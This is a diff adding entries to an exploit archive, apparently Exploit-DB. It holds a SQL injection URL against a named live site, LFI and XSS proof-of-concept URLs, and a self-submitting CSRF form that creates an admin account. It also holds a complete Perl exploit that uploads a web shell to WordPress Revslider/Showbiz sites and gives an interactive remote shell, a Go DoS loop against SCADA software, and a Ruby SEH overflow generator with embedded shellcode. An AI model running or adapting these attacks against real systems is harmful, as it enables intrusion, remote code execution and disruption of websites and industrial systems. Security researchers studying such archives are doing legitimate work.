else if ($rub == "modif")
{
formulaireRobot($robot); //line 44 (we will be analysis to robots.lib.php for line)
}
analysis: (/admin/robots.lib.php)
function formulaireRobot($robot) //line 71 (remember function line 44 in robots.php)
{
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
if ($robot != -1)
{
$title = $RS_LANG["ModifyRobot"];
$sql = "SELECT *";
$sql .= " FROM ".$RS_TABLE_ROBOTS;
$sql .= " WHERE id=".$robot; // line 80 (ver yansin amuga goyum!!!)
$res = mysql_query($sql) or erreurServeurMySQL($sql);
$enr = mysql_fetch_array($res);
$rub = "modif";
$actif = $enr["actif"];
} //line 85
for demo:
http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=modif&robot=0x90+union+select+1,2,3,4,5,database(),7,8,9,10

9
platforms/php/webapps/35376.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46507/info
mySeatXT is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
mySeatXT 0.164 is vulnerable; other versions may also be affected.
http://www.example.com/myseatxt/contactform/cancel.php?lang=../../../../../../../../windows/system.ini%00

79
platforms/php/webapps/35381.txt Executable file
View file

@ -0,0 +1,79 @@
Advisory ID: HTB23240
Product: xEpan
Vendor: Xavoc Technocrats Pvt. Ltd.
Vulnerable Version(s): 1.0.1 and probably prior
Tested Version: 1.0.1
Advisory Publication: October 22, 2014 [without technical details]
Vendor Notification: October 22, 2014
Public Disclosure: November 26, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-8429
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Not Fixed
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in xEpan, which can be exploited to compromise vulnerable web site.
1) ?ross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429
The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user accounts. A remote unauthenticated attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit, create new account with administrative privileges and get total control over the vulnerable website.
A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "password":
<form action="http://[host]/?page=owner/users&web_owner_users_crud_virtualpage=add&submit=web_web_owner_users_crud_virtualpage_form" method="post" name="main">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_name" value="name">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_email" value="email@email.com">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_username" value="immuniweb">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_password" value="password">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_created_at" value="21/10/2014">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_type" value="100">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_is_active" value="1">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_activation_code" value="">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_last_login_date" value="">
<input type="hidden" name="ajax_submit" value="form_submit">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Currently we are not aware of any official solution for this vulnerability.
<b>Disclosure timeline:</b>
2014-10-22 Vendor notified via several emails.
2014-10-22 Vendor denies vulnerability.
2014-11-06 Vulnerability is confirmed in the latest version of xEpan 1.0.4 which was released on the 2nd of November (we initially suspected a "silent fix").
2014-11-06 Vulnerability confirmed in 1.0.4 as well. Vendor notified about the problem once again.
2014-11-10 Fix requested via several emails.
2014-11-17 Fix requested via several emails.
2014-11-24 Fix requested via several emails.
2014-11-24 Vulnerability still exist in latest version 1.0.4.1 which was released at November, 20.
2014-11-26 Public disclosure.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23240 - https://www.htbridge.com/advisory/HTB23240 - ?ross-Site Request Forgery (CSRF) in xEpan.
[2] xEpan - http://www.xepan.org/ - xEpan is a an open source content management system (CMS) with Drag & Drop, bootstrap and live text editing.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

289
platforms/php/webapps/35385.pl Executable file
View file

@ -0,0 +1,289 @@
#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Updated: 25 November 2014
# Published: 25 November 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: ThemePunch
# Vendor url: http://themepunch.com
# Software: Revslider/Showbiz Pro
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
# Products url:
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
# Vulnerable scripts:
# revslider/revslider_admin.php
# showbiz/showbiz_admin.php
#
# About the plugins:
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
# kind of content whith highly customizable, transitions, effects and custom animations.
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
# amount of teaser items.
#
# Description:
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
# attacker to abuse administrative features.
# Some of the features include:
# Creating/Deleting/Updating sliders
# Importing/exporting sliders
# Updading plugin
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
#
# PoC on revslider:
# 1- Deleting a slider:
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
# http://****.com/wp-admin/admin-ajax.php
# * Connected to ****.com (**.**.**.**) port 80 (#0)
# > POST /wp-admin/admin-ajax.php HTTP/1.1
# > User-Agent: curl/7.35.0
# > Host: ****.com
# > Accept: */*
# > Content-Length: 73
# > Content-Type: application/x-www-form-urlencoded
# >
# * upload completely sent off: 73 out of 73 bytes
# < HTTP/1.1 200 OK
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
# < X-Powered-By: PHP/5.4.18
# < X-Robots-Tag: noindex
# < X-Content-Type-Options: nosniff
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
# < Cache-Control: no-cache, must-revalidate, max-age=0
# < Pragma: no-cache
# < X-Frame-Options: SAMEORIGIN
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
# < Transfer-Encoding: chunked
# < Content-Type: text/html; charset=UTF-8
# <
# * Connection #0 to host http://****.com left intact
#
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
#
# 2- Uploading an web shell:
# The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
# and save them it in the same directory where you have the exploit.
#
# Demo:
# perl morxrev.pl http://localhost revslider
# ===================================================
# --- Revslider/Showbiz shell upload exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Target set to revslider
# [*] MorXploiting http://localhost
# [*] Sent payload
# [+] Payload successfully executed
# [*] Checking if shell was uploaded
# [+] Shell successfully uploaded
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@MorXploit:~$
#
# Download:
# Exploit:
# http://www.morxploit.com/morxploits/morxrevbiz.pl
# Exploit update zip files:
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Mitigation:
# Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
# auto-update feature on, otherwise ... you are screwed.
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
# as well as the ability to dump the entire wordpress database locally.
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
#
# Got comments or questions?
# Simo_at_MorXploit_dot_com
#
# Did you like this exploit?
# Feel free to buy me a beer =)
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
# Cheers!
use LWP::UserAgent;
use MIME::Base64;
use strict;
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Revslider/Showbiz shell upload exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}
if (!defined ($ARGV[0] && $ARGV[1])) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";
unless (-e ($zip1 && $zip2))
{
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n";
exit;
}
my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;
if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
$update_file = "$zip2";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}
banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";
my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
print "[*] Sent payload\n";
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}
elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}
elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}
else {
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}
print "[*] Checking if shell was uploaded\n";
sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");
if ($status->decoded_content =~ /system\(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}
elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}
elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content;
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);
while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit")
{
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}

9
platforms/php/webapps/35387.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46561/info
phpShop is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpShop versions 0.8.1 and prior are vulnerable.
http://www.example.com/phpshop0_8_1/?page=store/XSS&%26%26%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3d1

32
platforms/php/webapps/35388.txt Executable file
View file

@ -0,0 +1,32 @@
WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : WordPress - (html5-mp3-player-with-playlist) Plugin
|~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/
|~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus
|~Vulnerability Style : FULL PATH DISCLOSURE
|[~]Date : "26.11.2014"
|[~]Tested on : Kali Linux, Windows 7
|DORK: inurl:html5plus/html5full.php
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==============[Exploitation]===============================
http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php

2
platforms/unix/remote/22356.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/7106/info
Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets.
@ -5,6 +6,7 @@ Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries
An attacker can exploit this vulnerability by creating a specially formatted SMB/CIFS packet and sending it to a vulnerable Samba server. The overflow condition will be triggered and will cause smbd to overwrite sensitive areas of memory with attacker-supplied values.
Note that the smbd service runs with root privileges.
*/
/**
** sambash -- samba <= 2.2.7a reply_nttrans() linux x86 remote root

69
platforms/windows/dos/35379.go Executable file
View file

@ -0,0 +1,69 @@
// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho@gmail.com
// 29-10-2013 11:42
// Vendor Homepage: http://www.elipse.com.br/port/index.aspx
// Software Link: http://www.elipse.com.br/port/e3.aspx
// Version: 3.x and prior
// Tested on: windows
// CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8652
// NVD : https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8652
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
// exploit in Golang (golang.com) C Google
// compile and execute:
// go build Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
// chmod +x Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
// ./Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
package main
import (
"fmt"
"io/ioutil"
"log"
"net/http"
)
func main() {
count := 1
// fmt.Println ("")
// fmt.Println (" _____.__ ___. .__ __ ")
// fmt.Println (" _/ ____\__|______ ____\_ |__ |__|/ |_ ______ ")
// fmt.Println (" \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ ")
// fmt.Println (" | | | || | \/\ ___/| \_\ \ || | \___ \ ")
// fmt.Println (" |__| |__||__| \___ >___ /__||__| /____ > ")
// fmt.Println (" \/ \/ \/ ")
// fmt.Println (" bits on fire. ")
fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
fmt.Println ("29-10-2013 11:42")
fmt.Println ("mauro.risonho@gmail.com")
fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
fmt.Println ("20 requests connections per second")
for {
count += count
//http://192.168.0.1:1681/index.html -> Elipse 3 http://<ip-elipse4><port listen: default 1681>
fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
fmt.Println ("29-10-2013 11:42")
fmt.Println ("mauro.risonho@gmail.com")
fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
fmt.Println ("20 requests connections")
fmt.Println ("Connected Port 1681...Testing")
fmt.Println ("Counter Loops: ", count)
res, err := http.Get("http://192.168.0.1:1681/index.html")
if err != nil {
log.Fatal(err)
}
robots, err := ioutil.ReadAll(res.Body)
res.Body.Close()
if err != nil {
log.Fatal(err)
}
fmt.Printf("%s", robots)
}
}

45
platforms/windows/local/35377.rb Executable file
View file

@ -0,0 +1,45 @@
#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]
filename = "3-1-2-1-gb.wax"
seh = 43501
buff = "\x41" * 45000
nops = "\x90" * 16
# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
sc =
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
"\x0b\xcf\xdd\x05\xcc\xb0\x54\xe0\xfd\xe2\x03\x61\xaf\x32" +
"\x47\x27\x5c\xb8\x05\xd3\xd7\xcc\x81\xd4\x50\x7a\xf4\xdb" +
"\x61\x4a\x38\xb7\xa2\xcc\xc4\xc5\xf6\x2e\xf4\x06\x0b\x2e" +
"\x31\x7a\xe4\x62\xea\xf1\x57\x93\x9f\x47\x64\x92\x4f\xcc" +
"\xd4\xec\xea\x12\xa0\x46\xf4\x42\x19\xdc\xbe\x7a\x11\xba" +
"\x1e\x7b\xf6\xd8\x63\x32\x73\x2a\x17\xc5\x55\x62\xd8\xf4" +
"\x99\x29\xe7\x39\x14\x33\x2f\xfd\xc7\x46\x5b\xfe\x7a\x51" +
"\x98\x7d\xa1\xd4\x3d\x25\x22\x4e\xe6\xd4\xe7\x09\x6d\xda" +
"\x4c\x5d\x29\xfe\x53\xb2\x41\xfa\xd8\x35\x86\x8b\x9b\x11" +
"\x02\xd0\x78\x3b\x13\xbc\x2f\x44\x43\x18\x8f\xe0\x0f\x8a" +
"\xc4\x93\x4d\xc0\x1b\x11\xe8\xad\x1c\x29\xf3\x9d\x74\x18" +
"\x78\x72\x02\xa5\xab\x37\xec\x47\x7e\x4d\x85\xd1\xeb\xec" +
"\xc8\xe1\xc1\x32\xf5\x61\xe0\xca\x02\x79\x81\xcf\x4f\x3d" +
"\x79\xbd\xc0\xa8\x7d\x12\xe0\xf8\x1d\xf5\x72\x60\xe2"
buff[seh-4,4] = "\xeb\x0e\x90\x90"
buff[seh,4] = [0x10031659].pack("V").force_encoding("utf-8")
buff[seh+4,nops.size] = nops
buff[seh+(4+nops.size),sc.size] = sc
File.open(filename,"wb") do |fp|
fp.write(buff)
fp.close
puts "Exploit file created: #{filename} size: #{buff.size}"
end